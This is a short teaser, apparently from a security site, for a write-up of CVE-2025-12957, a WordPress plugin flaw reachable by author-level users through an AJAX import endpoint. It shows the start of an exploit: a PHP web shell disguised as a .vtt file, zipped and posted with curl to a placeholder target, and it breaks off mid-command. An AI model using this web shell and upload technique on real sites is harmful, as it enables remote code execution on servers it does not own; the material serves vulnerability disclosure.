CVE-2025-12957
## The Exploit Requires authenticated author-level access to the plugin’s AJAX import endpoint. ```bash printf '<?php system($_GET["cmd"]); ?>' > shell.php.vtt zip exploit.zip shell.php.vtt curl -i -s -k -X POST 'https://TARGET/wp-admin/...
Read article →